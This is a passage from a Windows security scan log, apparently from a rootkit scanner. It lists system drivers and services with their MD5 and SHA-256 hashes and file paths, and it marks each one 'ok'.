15:33:39.0676 0x04bc  [ 772A1DEEDFDBC244183B5C805D1B7D85, 7D821B8DF1F174E5414FFDEAB5207DB687740E9842F7203600AEBA086945AFC9 ] MEIx64          C:\Windows\system32\DRIVERS\HECIx64.sys
15:33:39.0682 0x04bc  MEIx64 - ok
15:33:39.0694 0x04bc  [ E40E80D0304A73E8D269F7141D77250B, 0DB4AC13A264F19A84DC0BCED54E8E404014CC09C993B172002B1561EC7E265A ] MMCSS           C:\Windows\system32\mmcss.dll
15:33:39.0729 0x04bc  MMCSS - ok
15:33:39.0732 0x04bc  [ 800BA92F7010378B09F9ED9270F07137, 94F9AF9E1BE80AE6AC39A2A74EF9FAB115DCAACC011D07DFA8D6A1DDC8A93342 ] Modem           C:\Windows\system32\drivers\modem.sys
15:33:39.0762 0x04bc  Modem - ok
15:33:39.0786 0x04bc  [ B03D591DC7DA45ECE20B3B467E6AADAA, 701FB0CAD8138C58507BE28845D3E24CE269A040737C29885944A0D851238732 ] monitor         C:\Windows\system32\DRIVERS\monitor.sys
15:33:39.0811 0x04bc  monitor - ok
15:33:39.0832 0x04bc  [ 7D27EA49F3C1F687D357E77A470AEA99, 7FE7CAF95959F127C6D932C01D539C06D80273C49A09761F6E8331C05B1A7EE7 ] mouclass        C:\Windows\system32\DRIVERS\mouclass.sys
15:33:39.0839 0x04bc  mouclass - ok
15:33:39.0844 0x04bc  [ D3BF052C40B0C4166D9FD86A4288C1E6, 5E65264354CD94E844BF1838CA1B8E49080EFA34605A32CF2F6A47A2B97FC183 ] mouhid          C:\Windows\system32\DRIVERS\mouhid.sys
15:33:39.0862 0x04bc  mouhid - ok
15:33:39.0876 0x04bc  [ 32E7A3D591D671A6DF2DB515A5CBE0FA, 47CED0B9067AE8BF5EEF60B17ADEE5906BEDCC56E4CB460B7BFBC12BB9A69E63 ] mountmgr        C:\Windows\system32\drivers\mountmgr.sys
15:33:39.0885 0x04bc  mountmgr - ok
15:33:39.0931 0x04bc  [ 707E98CC15C2224C078C9E71FF1889BC, 958416FE081436FDBF7F2BEBBB2795C54CC4F3F349D6DF463296A7BBA3404F13 ] MozillaMaintenance C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
15:33:39.0940 0x04bc  MozillaMaintenance - ok
15:33:39.0955 0x04bc  [ A44B420D30BD56E145D6A2BC8768EC58, B1E4DCA5A1008FA7A0492DC091FB2B820406AE13FD3D44F124E89B1037AF09B8 ] mpio            C:\Windows\system32\drivers\mpio.sys
15:33:39.0964 0x04bc  mpio - ok
15:33:39.0983 0x04bc  [ 6C38C9E45AE0EA2FA5E551F2ED5E978F, 5A3FA2F110029CB4CC4384998EDB59203FDD65EC45E01B897FB684F8956EAD20 ] mpsdrv          C:\Windows\system32\drivers\mpsdrv.sys
15:33:40.0005 0x04bc  mpsdrv - ok
15:33:40.0031 0x04bc  [ 54FFC9C8898113ACE189D4AA7199D2C1, 65F585C87F3F710FD5793FDFA96B740AD8D4317B0C120F4435CCF777300EA4F2 ] MpsSvc          C:\Windows\system32\mpssvc.dll
15:33:40.0085 0x04bc  MpsSvc - ok
15:33:40.0111 0x04bc  [ 83A296715A67D696F101130AB44B92A7, 365D984745C38CA6AD2EE038834A02BE03AAAF02BCEB40B4E60E4309C01C3BE2 ] MRxDAV          C:\Windows\system32\drivers\mrxdav.sys
15:33:40.0131 0x04bc  MRxDAV - ok
15:33:40.0158 0x04bc  [ 069B85494CDBC587A4A60AD75A13CC5D, C708F6E30707B3DA162CB2E41BF24A9ACF7D95E858D623802C0E29C9A9C7FB32 ] mrxsmb          C:\Windows\system32\DRIVERS\mrxsmb.sys
15:33:40.0187 0x04bc  mrxsmb - ok
15:33:40.0207 0x04bc  [ 38CC780346941F41829C42FA73E19B54, E713C2937D7E0FAC520AFB32F4C1257067DE0290875FEB2E5E567ACBEA687CA1 ] mrxsmb10        C:\Windows\system32\DRIVERS\mrxsmb10.sys
15:33:40.0233 0x04bc  mrxsmb10 - ok
15:33:40.0247 0x04bc  [ 72978589D92E2F80C89C7E9F88F206CA, 4C62AAA8225672AEF2EBF066459B992D85F6C0537EDFF7D23E8F4F3E9D896CAB ] mrxsmb20        C:\Windows\system32\DRIVERS\mrxsmb20.sys
15:33:40.0264 0x04bc  mrxsmb20 - ok
15:33:40.0292 0x04bc  [ C25F0BAFA182CBCA2DD3C851C2E75796, 643E158A0948DF331807AEAA391F23960362E46C0A0CF6D22A99020EAE7B10F8 ] msahci          C:\Windows\system32\drivers\msahci.sys
15:33:40.0301 0x04bc  msahci - ok
15:33:40.0321 0x04bc  [ DB801A638D011B9633829EB6F663C900, B34FD33A215ACCF2905F4B7D061686CDB1CB9C652147AF56AE14686C1F6E3C74 ] msdsm           C:\Windows\system32\drivers\msdsm.sys
15:33:40.0330 0x04bc  msdsm - ok
15:33:40.0346 0x04bc  [ DE0ECE52236CFA3ED2DBFC03F28253A8, 2FBBEC4CACB5161F68D7C2935852A5888945CA0F107CF8A1C01F4528CE407DE3 ] MSDTC           C:\Windows\System32\msdtc.exe
15:33:40.0370 0x04bc  MSDTC - ok
15:33:40.0383 0x04bc  [ AA3FB40E17CE1388FA1BEDAB50EA8F96, 69F93E15536644C8FD679A20190CFE577F4985D3B1B4A4AA250A168615AE1E99 ] Msfs            C:\Windows\system32\drivers\Msfs.sys
15:33:40.0405 0x04bc  Msfs - ok
15:33:40.0419 0x04bc  [ F9D215A46A8B9753F61767FA72A20326, 6F76642B45E0A7EF6BCAB8B37D55CCE2EAA310ED07B76D43FCB88987C2174141 ] mshidkmdf       C:\Windows\System32\drivers\mshidkmdf.sys
15:33:40.0449 0x04bc  mshidkmdf - ok
15:33:40.0464 0x04bc  [ D916874BBD4F8B07BFB7FA9B3CCAE29D, B229DA150713DEDBC4F05386C9D9DC3BC095A74F44F3081E88311AB73BC992A1 ] msisadrv        C:\Windows\system32\drivers\msisadrv.sys
15:33:40.0471 0x04bc  msisadrv - ok
15:33:40.0502 0x04bc  [ 808E98FF49B155C522E6400953177B08, F873F5BFF0984C5165DF67E92874D3F6EB8D86F9B5AD17013A0091CA33A1A3D5 ] MSiSCSI         C:\Windows\system32\iscsiexe.dll
15:33:40.0532 0x04bc  MSiSCSI - ok
15:33:40.0534 0x04bc  msiserver - ok
15:33:40.0554 0x04bc  [ 49CCF2C4FEA34FFAD8B1B59D49439366, E5752EA57C7BDAD5F53E3BC441A415E909AC602CAE56234684FB8789A20396C7 ] MSKSSRV         C:\Windows\system32\drivers\MSKSSRV.sys
15:33:40.0586 0x04bc  MSKSSRV - ok
15:33:40.0607 0x04bc  [ BDD71ACE35A232104DDD349EE70E1AB3, 27464A66868513BE6A01B75D7FC5B0D6B71842E4E20CE3F76B15C071A0618BBB ] MSPCLOCK        C:\Windows\system32\drivers\MSPCLOCK.sys
15:33:40.0637 0x04bc  MSPCLOCK - ok
15:33:40.0651 0x04bc  [ 4ED981241DB27C3383D72092B618A1D0, E12F121E641249DB3491141851B59E1496F4413EDF58E863388F1C229838DFCC ] MSPQM           C:\Windows\system32\drivers\MSPQM.sys
15:33:40.0680 0x04bc  MSPQM - ok
15:33:40.0697 0x04bc  [ 759A9EEB0FA9ED79DA1FB7D4EF78866D, 64E3BC613EC4872B1B344CBF71EE15BE195592E3244C1EE099C6F8B95A40F133 ] MsRPC           C:\Windows\system32\drivers\MsRPC.sys
15:33:40.0710 0x04bc  MsRPC - ok
15:33:40.0722 0x04bc  [ 0EED230E37515A0EAEE3C2E1BC97B288, B1D8F8A75006B6E99214CA36D27A8594EF8D952F315BEB201E9BAC9DE3E64D42 ] mssmbios        C:\Windows\system32\DRIVERS\mssmbios.sys
15:33:40.0728 0x04bc  mssmbios - ok
15:33:40.0746 0x04bc  [ 2E66F9ECB30B4221A318C92AC2250779, DF175E1AB6962303E57F26DAE5C5C1E40B8640333F3E352A64F6A5F1301586CD ] MSTEE           C:\Windows\system32\drivers\MSTEE.sys
15:33:40.0777 0x04bc  MSTEE - ok
15:33:40.0792 0x04bc  [ 7EA404308934E675BFFDE8EDF0757BCD, 306CD02D89CFCFE576242360ED5F9EEEDCAFC43CD43B7D2977AE960F9AEC3232 ] MTConfig        C:\Windows\system32\drivers\MTConfig.sys
15:33:40.0801 0x04bc  MTConfig - ok
15:33:40.0817 0x04bc  [ F9A18612FD3526FE473C1BDA678D61C8, 32F7975B5BAA447917F832D9E3499B4B6D3E90D73F478375D0B70B36C524693A ] Mup             C:\Windows\system32\Drivers\mup.sys
15:33:40.0826 0x04bc  Mup - ok
15:33:40.0858 0x04bc  [ 582AC6D9873E31DFA28A4547270862DD, BD540499F74E8F59A020D935D18E36A3A97C1A6EC59C8208436469A31B16B260 ] napagent        C:\Windows\system32\qagentRT.dll
15:33:40.0896 0x04bc  napagent - ok
15:33:40.0924 0x04bc  [ 1EA3749C4114DB3E3161156FFFFA6B33, 54C2E77BCE1037711A11313AC25B8706109098C10A31AA03AEB7A185E97800D7 ] NativeWifiP     C:\Windows\system32\DRIVERS\nwifi.sys
15:33:40.0952 0x04bc  NativeWifiP - ok
15:33:41.0036 0x04bc  [ C180A82874D3CDC390A27F2F1E1AF025, 9F473661524D645D5C1D616BF2BEC2996DFAE9268B7CF280FCCBD19AA072E567 ] NAVENG          C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Data\Definitions\VirusDefs\20141106.004\ENG64.SYS
15:33:41.0045 0x04bc  NAVENG - ok
15:33:41.0129 0x04bc  [ E66CA6C321614D7BC0AFC9C8436131B9, BF732419D56E1B8AB3B11B19403087D4EDBF9108F0252ACBB561235040AB4436 ] NAVEX15         C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Data\Definitions\VirusDefs\20141106.004\EX64.SYS
15:33:41.0166 0x04bc  NAVEX15 - ok
15:33:41.0207 0x04bc  [ 760E38053BF56E501D562B70AD796B88, F856E81A975D44F8684A6F2466549CEEDFAEB3950191698555A93A1206E0A42D ] NDIS            C:\Windows\system32\drivers\ndis.sys
15:33:41.0230 0x04bc  NDIS - ok
15:33:41.0257 0x04bc  [ 9F9A1F53AAD7DA4D6FEF5BB73AB811AC, D7E5446E83909AE25506BB98FBDD878A529C87963E3C1125C4ABAB25823572BC ] NdisCap         C:\Windows\system32\DRIVERS\ndiscap.sys
15:33:41.0289 0x04bc  NdisCap - ok
15:33:41.0317 0x04bc  [ 30639C932D9FEF22B31268FE25A1B6E5, 32873D95339600F6EEFA51847D12C563FF01F320DC59055B242FA2887C99F9D6 ] NdisTapi        C:\Windows\system32\DRIVERS\ndistapi.sys
15:33:41.0337 0x04bc  NdisTapi - ok
15:33:41.0367 0x04bc  [ 662CBFAA835FFF1A935DD01890AAFC62, 41CD715EF77446E2ECD70A512BF2A5DC8C32C0F38E56F48621461784C28CF914 ] Ndisuio         C:\Windows\system32\DRIVERS\ndisuio.sys
15:33:41.0388 0x04bc  Ndisuio - ok
15:33:41.0403 0x04bc  [ 53F7305169863F0A2BDDC49E116C2E11, 881E9346D3C02405B7850ADC37E720990712EC9C666A0CE96E252A487FD2CE77 ] NdisWan         C:\Windows\system32\DRIVERS\ndiswan.sys
15:33:41.0436 0x04bc  NdisWan - ok
15:33:41.0457 0x04bc  [ 015C0D8E0E0421B4CFD48CFFE2825879, 4242E2D42CCFC859B2C0275C5331798BC0BDA68E51CF4650B6E64B1332071023 ] NDProxy         C:\Windows\system32\drivers\NDProxy.sys
15:33:41.0478 0x04bc  NDProxy - ok
15:33:41.0512 0x04bc  [ 86743D9F5D2B1048062B14B1D84501C4, DBF6D6A60AB774FCB0F464FF2D285A7521D0A24006687B243AB46B17D8032062 ] NetBIOS         C:\Windows\system32\DRIVERS\netbios.sys
15:33:41.0535 0x04bc  NetBIOS - ok
15:33:41.0552 0x04bc  [ 09594D1089C523423B32A4229263F068, 7426A9B8BA27D3225928DDEFBD399650ABB90798212F56B7D12158AC22CCCE37 ] NetBT           C:\Windows\system32\DRIVERS\netbt.sys
15:33:41.0576 0x04bc  NetBT - ok
15:33:41.0584 0x04bc  [ 204F3F58212B3E422C90BD9691A2DF28, D748A8CEE4D59B4248C9B1ACA5155D0FF6635A29564B4391B7FAC6261F93FE99 ] Netlogon        C:\Windows\system32\lsass.exe
15:33:41.0592 0x04bc  Netlogon - ok
15:33:41.0703 0x04bc  [ 847D3AE376C0817161A14A82C8922A9E, 37AE692B3481323134125EF58F2C3CBC20177371AF2F5874F53DD32A827CB936 ] Netman          C:\Windows\System32\netman.dll
15:33:41.0741 0x04bc  Netman - ok
15:33:41.0795 0x04bc  [ 21318671BCAD3ACF16638F98D4D00973, CEA6E3B6BCB4B74A9ACACBEEA12EEA967BBC2240398E2EBC04D7910109CACA11 ] NetMsmqActivator C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
15:33:41.0805 0x04bc  NetMsmqActivator - ok
15:33:41.0827 0x04bc  [ 21318671BCAD3ACF16638F98D4D00973, CEA6E3B6BCB4B74A9ACACBEEA12EEA967BBC2240398E2EBC04D7910109CACA11 ] NetPipeActivator C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
15:33:41.0837 0x04bc  NetPipeActivator - ok
15:33:41.0852 0x04bc  [ 5F28111C648F1E24F7DBC87CDEB091B8, 2E8645285921EDB98BB2173E11E57459C888D52E80D85791D169C869DE8813B9 ] netprofm        C:\Windows\System32\netprofm.dll
15:33:41.0892 0x04bc  netprofm - ok


15:33:41.0896 0x04bc  [ 21318671BCAD3ACF16638F98D4D00973, CEA6E3B6BCB4B74A9ACACBEEA12EEA967BBC2240398E2EBC04D7910109CACA11 ] NetTcpActivator C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
15:33:41.0905 0x04bc  NetTcpActivator - ok
15:33:41.0909 0x04bc  [ 21318671BCAD3ACF16638F98D4D00973, CEA6E3B6BCB4B74A9ACACBEEA12EEA967BBC2240398E2EBC04D7910109CACA11 ] NetTcpPortSharing C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
15:33:41.0918 0x04bc  NetTcpPortSharing - ok
15:33:41.0940 0x04bc  [ 77889813BE4D166CDAB78DDBA990DA92, 2EF531AE502B943632EEC66A309A8BFCDD36120A5E1473F4AAF3C2393AD0E6A3 ] nfrd960         C:\Windows\system32\drivers\nfrd960.sys
15:33:41.0948 0x04bc  nfrd960 - ok
15:33:41.0977 0x04bc  [ 843E337C1CDD282545ED7515345E263B, B0E485856FC1C28DA6C453BF60A04F603BA15D7B0D84896E878049198F2FD1C9 ] NlaSvc          C:\Windows\System32\nlasvc.dll
15:33:42.0005 0x04bc  NlaSvc - ok
15:33:42.0019 0x04bc  [ 1E4C4AB5C9B8DD13179BBDC75A2A01F7, D8957EF7060A69DBB3CD6B2C45B1E4143592AB8D018471E17AC04668157DC67F ] Npfs            C:\Windows\system32\drivers\Npfs.sys
15:33:42.0041 0x04bc  Npfs - ok
15:33:42.0049 0x04bc  [ D54BFDF3E0C953F823B3D0BFE4732528, 497A1DCC5646EC22119273216DF10D5442D16F83E4363770F507518CF6EAA53A ] nsi             C:\Windows\system32\nsisvc.dll
15:33:42.0080 0x04bc  nsi - ok
15:33:42.0096 0x04bc  [ E7F5AE18AF4168178A642A9247C63001, 133023B7E4BA8049C4CAED3282BDD25571D1CC25FAC3B820C7F981D292689D76 ] nsiproxy        C:\Windows\system32\drivers\nsiproxy.sys
15:33:42.0130 0x04bc  nsiproxy - ok
15:33:42.0179 0x04bc  [ 48B6047F82D5A8D0AEC71593F4ACD79B, A96F91C1DFD1CBB17C05B5DAAC4956169380E988FB4223E4588FEF34C2BC5249 ] Ntfs            C:\Windows\system32\drivers\Ntfs.sys
15:33:42.0231 0x04bc  Ntfs - ok
15:33:42.0243 0x04bc  [ 9899284589F75FA8724FF3D16AED75C1, 181188599FD5D4DE33B97010D9E0CAEABAB9A3EF50712FE7F9AA0735CD0666D6 ] Null            C:\Windows\system32\drivers\Null.sys
15:33:42.0263 0x04bc  Null - ok
15:33:42.0302 0x04bc  [ 0A92CB65770442ED0DC44834632F66AD, 581327F07A68DBD5CC749214BE5F1211FC2CE41C7A4F0656B680AFB51A35ACE7 ] nvraid          C:\Windows\system32\drivers\nvraid.sys
15:33:42.0312 0x04bc  nvraid - ok
15:33:42.0326 0x04bc  [ DAB0E87525C10052BF65F06152F37E4A, AD9BFF0D5FD3FFB95C758B478E1F6A9FE45E7B37AEC71EB5070D292FEAAEDF37 ] nvstor          C:\Windows\system32\drivers\nvstor.sys
15:33:42.0336 0x04bc  nvstor - ok
15:33:42.0362 0x04bc  [ 270D7CD42D6E3979F6DD0146650F0E05, 752489E54C9004EDCBE1F1F208FFD864DA5C83E59A2DDE6B3E0D63ECA996F76F ] nv_agp          C:\Windows\system32\drivers\nv_agp.sys
15:33:42.0372 0x04bc  nv_agp - ok
15:33:42.0382 0x04bc  [ 3589478E4B22CE21B41FA1BFC0B8B8A0, AD2469FC753FE552CB809FF405A9AB23E7561292FE89117E3B3B62057EFF0203 ] ohci1394        C:\Windows\system32\drivers\ohci1394.sys
15:33:42.0392 0x04bc  ohci1394 - ok
15:33:42.0442 0x04bc  [ 9D10F99A6712E28F8ACD5641E3A7EA6B, 70964A0ED9011EA94044E15FA77EDD9CF535CC79ED8E03A3721FF007E69595CC ] ose             C:\Program Files (x86)\Common Files\Microsoft Shared\Source Engine\OSE.EXE
15:33:42.0451 0x04bc  ose - ok
15:33:42.0627 0x04bc  [ 61BFFB5F57AD12F83AB64B7181829B34, 1DD0DD35E4158F95765EE6639F217DF03A0A19E624E020DBA609268C08A13846 ] osppsvc         C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
15:33:42.0747 0x04bc  osppsvc - ok
15:33:42.0764 0x04bc  [ 3EAC4455472CC2C97107B5291E0DCAFE, E51F373F2DBEAEE516B42BAE8C1B5BB68D00B881323E842CB6EDEC0A183CFFC3 ] p2pimsvc        C:\Windows\system32\pnrpsvc.dll
15:33:42.0800 0x04bc  p2pimsvc - ok
15:33:42.0828 0x04bc  [ 927463ECB02179F88E4B9A17568C63C3, FEFD3447692C277D59EEC7BF218552C8BB6B8C98C26E973675549628408B94CE ] p2psvc          C:\Windows\system32\p2psvc.dll
15:33:42.0844 0x04bc  p2psvc - ok
15:33:42.0882 0x04bc  [ 0086431C29C35BE1DBC43F52CC273887, 0D116D49EF9ABB57DA005764F25E692622210627FC2048F06A989B12FA8D0A80 ] Parport         C:\Windows\system32\drivers\parport.sys
15:33:42.0892 0x04bc  Parport - ok
15:33:42.0911 0x04bc  [ E9766131EEADE40A27DC27D2D68FBA9C, 63C295EC96DBD25F1A8B908295CCB86B54F2A77A02AAA11E5D9160C2C1A492B6 ] partmgr         C:\Windows\system32\drivers\partmgr.sys
15:33:42.0919 0x04bc  partmgr - ok
15:33:42.0934 0x04bc  [ 3AEAA8B561E63452C655DC0584922257, 04C072969B58657602EB0C21CEDF24FCEE14E61B90A0F758F93925EF2C9FC32D ] PcaSvc          C:\Windows\System32\pcasvc.dll
15:33:42.0962 0x04bc  PcaSvc - ok
15:33:42.0976 0x04bc  [ 94575C0571D1462A0F70BDE6BD6EE6B3, 7139BAC653EA94A3DD3821CAB35FC5E22F4CCA5ACC2BAABDAA27E4C3C8B27FC9 ] pci             C:\Windows\system32\drivers\pci.sys
15:33:42.0986 0x04bc  pci - ok
15:33:43.0020 0x04bc  [ B5B8B5EF2E5CB34DF8DCF8831E3534FA, F2A7CC645B96946CC65BF60E14E70DC09C848D27C7943CE5DEA0C01A6B863480 ] pciide          C:\Windows\system32\drivers\pciide.sys
15:33:43.0028 0x04bc  pciide - ok
15:33:43.0034 0x04bc  [ B2E81D4E87CE48589F98CB8C05B01F2F, 6763BEE7270A4873B3E131BFB92313E2750FCBD0AD73C23D1C4F98F7DF73DE14 ] pcmcia          C:\Windows\system32\drivers\pcmcia.sys
15:33:43.0045 0x04bc  pcmcia - ok
15:33:43.0071 0x04bc  [ D6B9C2E1A11A3A4B26A182FFEF18F603, BBA5FE08B1DDD6243118E11358FD61B10E850F090F061711C3CB207CE5FBBD36 ] pcw             C:\Windows\system32\drivers\pcw.sys
15:33:43.0080 0x04bc  pcw - ok
15:33:43.0101 0x04bc  [ 68769C3356B3BE5D1C732C97B9A80D6E, FB2D61145980A2899D1B7729184C54070315B0E63C9A22400A76CCD39E00029C ] PEAUTH          C:\Windows\system32\drivers\peauth.sys
15:33:43.0144 0x04bc  PEAUTH - ok
15:33:43.0194 0x04bc  [ B9B0A4299DD2D76A4243F75FD54DC680, BBF62E9628131FA396EB08D63B76D2D5FBDD61339E92B759125A066470D1C039 ] PeerDistSvc     C:\Windows\system32\peerdistsvc.dll
15:33:43.0261 0x04bc  PeerDistSvc - ok
15:33:43.0794 0x04bc  [ E495E408C93141E8FC72DC0C6046DDFA, 489B957DADA0DC128A09468F1AD082DCC657E86053208EA06A12937BE86FB919 ] PerfHost        C:\Windows\SysWow64\perfhost.exe
15:33:43.0814 0x04bc  PerfHost - ok
15:33:43.0855 0x04bc  [ C7CF6A6E137463219E1259E3F0F0DD6C, 08D7244F52AA17DD669AA6F77C291DAC88E7B2D1887DE422509C1F83EC85F3DD ] pla             C:\Windows\system32\pla.dll
15:33:43.0916 0x04bc  pla - ok
15:33:43.0983 0x04bc  [ 25FBDEF06C4D92815B353F6E792C8129, 57D9764AE6BCE33B242C399CDFC10DD405975BD6411CA8C75FBCD06EEB8442A9 ] PlugPlay        C:\Windows\system32\umpnpmgr.dll
15:33:44.0016 0x04bc  PlugPlay - ok
15:33:44.0029 0x04bc  [ 7195581CEC9BB7D12ABE54036ACC2E38, 9C4E5D6EA984148F2663DC529083408B2248DFF6DAAC85D9195F80A722782315 ] PNRPAutoReg     C:\Windows\system32\pnrpauto.dll
15:33:44.0046 0x04bc  PNRPAutoReg - ok
15:33:44.0066 0x04bc  [ 3EAC4455472CC2C97107B5291E0DCAFE, E51F373F2DBEAEE516B42BAE8C1B5BB68D00B881323E842CB6EDEC0A183CFFC3 ] PNRPsvc         C:\Windows\system32\pnrpsvc.dll
15:33:44.0080 0x04bc  PNRPsvc - ok
15:33:44.0116 0x04bc  [ 4F15D75ADF6156BF56ECED6D4A55C389, 2ADA3EA69A5D7EC2A4D2DD89178DB94EAFDDF95F07B0070D654D9F7A5C12A044 ] PolicyAgent     C:\Windows\System32\ipsecsvc.dll
15:33:44.0152 0x04bc  PolicyAgent - ok
15:33:44.0172 0x04bc  [ B2392DBB9085E39AAB5204BE92FB3AB0, BB7741859C9FB5B3DCA98DDC2869C05AD06DA896F5B0CA821D433C46463F8536 ] Power           C:\Windows\system32\umpo.dll
15:33:44.0184 0x04bc  Power - ok
15:33:44.0207 0x04bc  [ F92A2C41117A11A00BE01CA01A7FCDE9, 38ADC6052696D110CA5F393BC586791920663F5DA66934C2A824DDA9CD89C763 ] PptpMiniport    C:\Windows\system32\DRIVERS\raspptp.sys
15:33:44.0242 0x04bc  PptpMiniport - ok
15:33:44.0269 0x04bc  [ 0D922E23C041EFB1C3FAC2A6F943C9BF, 855418A6A58DCAFB181A1A68613B3E203AFB0A9B3D9D26D0C521F9F613B4EAD5 ] Processor       C:\Windows\system32\drivers\processr.sys
15:33:44.0288 0x04bc  Processor - ok
15:33:44.0321 0x04bc  [ 72C67373E37F4DE241390065E981E3D1, BABB4039BB3E69C259F194D76449D47C6EA674DAA4E63EA4F29521C1416B5661 ] ProfSvc         C:\Windows\system32\profsvc.dll
15:33:44.0340 0x04bc  ProfSvc - ok
15:33:44.0356 0x04bc  [ 204F3F58212B3E422C90BD9691A2DF28, D748A8CEE4D59B4248C9B1ACA5155D0FF6635A29564B4391B7FAC6261F93FE99 ] ProtectedStorage C:\Windows\system32\lsass.exe
15:33:44.0364 0x04bc  ProtectedStorage - ok
15:33:44.0387 0x04bc  [ 0557CF5A2556BD58E26384169D72438D, F6F83A616B1F1C6C0DF6D2EC2513E6C23FD4FAA6D36518B8676C619AB74957B4 ] Psched          C:\Windows\system32\DRIVERS\pacer.sys
15:33:44.0423 0x04bc  Psched - ok
15:33:44.0462 0x04bc  [ A53A15A11EBFD21077463EE2C7AFEEF0, 6002B012A75045DEA62640A864A8721EADE2F8B65BEB5F5BA76D8CD819774489 ] ql2300          C:\Windows\system32\drivers\ql2300.sys
15:33:44.0505 0x04bc  ql2300 - ok
15:33:44.0528 0x04bc  [ 4F6D12B51DE1AAEFF7DC58C4D75423C8, FB6ABAB741CED66A79E31A45111649F2FA3E26CEE77209B5296F789F6F7D08DE ] ql40xx          C:\Windows\system32\drivers\ql40xx.sys
15:33:44.0537 0x04bc  ql40xx - ok
15:33:44.0563 0x04bc  [ 906191634E99AEA92C4816150BDA3732, A0305436384104C3B559F9C73902DA19B96B518413379E397C5CDAB0B2B9418F ] QWAVE           C:\Windows\system32\qwave.dll
15:33:44.0579 0x04bc  QWAVE - ok
15:33:44.0586 0x04bc  [ 76707BB36430888D9CE9D705398ADB6C, 35C1D1D05F98AC29A33D3781F497A0B40A3CB9CDF25FE1F28F574E40DDF70535 ] QWAVEdrv        C:\Windows\system32\drivers\qwavedrv.sys
15:33:44.0608 0x04bc  QWAVEdrv - ok
15:33:44.0611 0x04bc  [ 5A0DA8AD5762FA2D91678A8A01311704, 8A64EB5DBAB7048A9E42A21CEB62CCD5B007A80C199892D7F8C69B48E8A255EF ] RasAcd          C:\Windows\system32\DRIVERS\rasacd.sys
15:33:44.0632 0x04bc  RasAcd - ok
15:33:44.0700 0x04bc  [ 7ECFF9B22276B73F43A99A15A6094E90, 62C70DA127F48F796F8897BBFA23AB6EB080CC923F0F091DFA384A93F5C90CA1 ] RasAgileVpn     C:\Windows\system32\DRIVERS\AgileVpn.sys
15:33:44.0721 0x04bc  RasAgileVpn - ok
15:33:44.0728 0x04bc  [ 8F26510C5383B8DBE976DE1CD00FC8C7, 60E618C010E8A723960636415573FA17EA0BBEF79647196B3BC0B8DEE680E090 ] RasAuto         C:\Windows\System32\rasauto.dll
15:33:44.0763 0x04bc  RasAuto - ok
15:33:44.0777 0x04bc  [ 471815800AE33E6F1C32FB1B97C490CA, 27307265F743DE3A3A3EC1B2C472A3D85FDD0AEC458E0B1177593141EE072698 ] Rasl2tp         C:\Windows\system32\DRIVERS\rasl2tp.sys
15:33:44.0807 0x04bc  Rasl2tp - ok
15:33:44.0828 0x04bc  [ EE867A0870FC9E4972BA9EAAD35651E2, 1B848D81705081FD2E18AC762DA7F51455657DAF860BF363DC15925A148BCADA ] RasMan          C:\Windows\System32\rasmans.dll
15:33:44.0855 0x04bc  RasMan - ok
15:33:44.0870 0x04bc  [ 855C9B1CD4756C5E9A2AA58A15F58C25, A514F8A9C304D54BDA8DC60F5A64259B057EC83A1CAAF6D2B58CFD55E9561F72 ] RasPppoe        C:\Windows\system32\DRIVERS\raspppoe.sys
15:33:44.0902 0x04bc  RasPppoe - ok
15:33:44.0925 0x04bc  [ E8B1E447B008D07FF47D016C2B0EEECB, FEC789F82B912F3E14E49524D40FEAA4373B221156F14045E645D7C37859258C ] RasSstp         C:\Windows\system32\DRIVERS\rassstp.sys
15:33:44.0957 0x04bc  RasSstp - ok
15:33:44.0991 0x04bc  [ 90F489A0A6BC302AEDCEDABFBC7952F8, 46E5065811A584209E84F2E39606EA9A355CF178BCD4D6CFFA83C2B45D740559 ] rdbss           C:\Windows\system32\DRIVERS\rdbss.sys
15:33:45.0022 0x04bc  rdbss - ok
15:33:45.0039 0x04bc  [ 302DA2A0539F2CF54D7C6CC30C1F2D8D, 1DF3501BBFFB56C3ECC39DBCC4287D3302216C2208CE22428B8C4967E5DE9D17 ] rdpbus          C:\Windows\system32\DRIVERS\rdpbus.sys
15:33:45.0060 0x04bc  rdpbus - ok
15:33:45.0090 0x04bc  [ CEA6CC257FC9B7715F1C2B4849286D24, A78144D18352EA802C39D9D42921CF97A3E0211766B2169B6755C6FC2D77A804 ] RDPCDD          C:\Windows\system32\DRIVERS\RDPCDD.sys
15:33:45.0122 0x04bc  RDPCDD - ok
15:33:45.0148 0x04bc  [ 1B6163C503398B23FF8B939C67747683, 339A5AA7970FF34FAAB213B655860C5B0DEC5F983A4A11A088017D849F320ACE ] RDPDR           C:\Windows\system32\drivers\rdpdr.sys
15:33:45.0167 0x04bc  RDPDR - ok
15:33:45.0187 0x04bc  [ BB5971A4F00659529A5C44831AF22365, 9AAA5C0D448E821FD85589505D99DF7749715A046BBD211F139E4E652ADDE41F ] RDPENCDD        C:\Windows\system32\drivers\rdpencdd.sys
15:33:45.0220 0x04bc  RDPENCDD - ok
15:33:45.0249 0x04bc  [ 216F3FA57533D98E1F74DED70113177A, 60C126A1409D1E9C39F1C9E95F70115BF4AF07780AB499F6E10A612540F173F4 ] RDPREFMP        C:\Windows\system32\drivers\rdprefmp.sys
15:33:45.0281 0x04bc  RDPREFMP - ok
15:33:45.0307 0x04bc  [ E61608AA35E98999AF9AAEEEA6114B0A, F754CDE89DC96786D2A3C4D19EE2AEF1008E634E4DE3C0CBF927436DE90C04A6 ] RDPWD           C:\Windows\system32\drivers\RDPWD.sys
15:33:45.0324 0x04bc  RDPWD - ok
15:33:45.0335 0x04bc  [ 9500266AFA2548D2812DC59D8C1D7BD3, 25FFD440B02D7D651B57133D94C95EB526F7189F3329060D004F28BA179BF89F ] rdyboost        C:\Windows\system32\drivers\rdyboost.sys
15:33:45.0345 0x04bc  rdyboost - ok
15:33:45.0368 0x04bc  [ 254FB7A22D74E5511C73A3F6D802F192, 3D0FB5840364200DE394F8CC28DA0E334C2B5FA8FF28A41656EE72287F3D3836 ] RemoteAccess    C:\Windows\System32\mprdim.dll
15:33:45.0392 0x04bc  RemoteAccess - ok
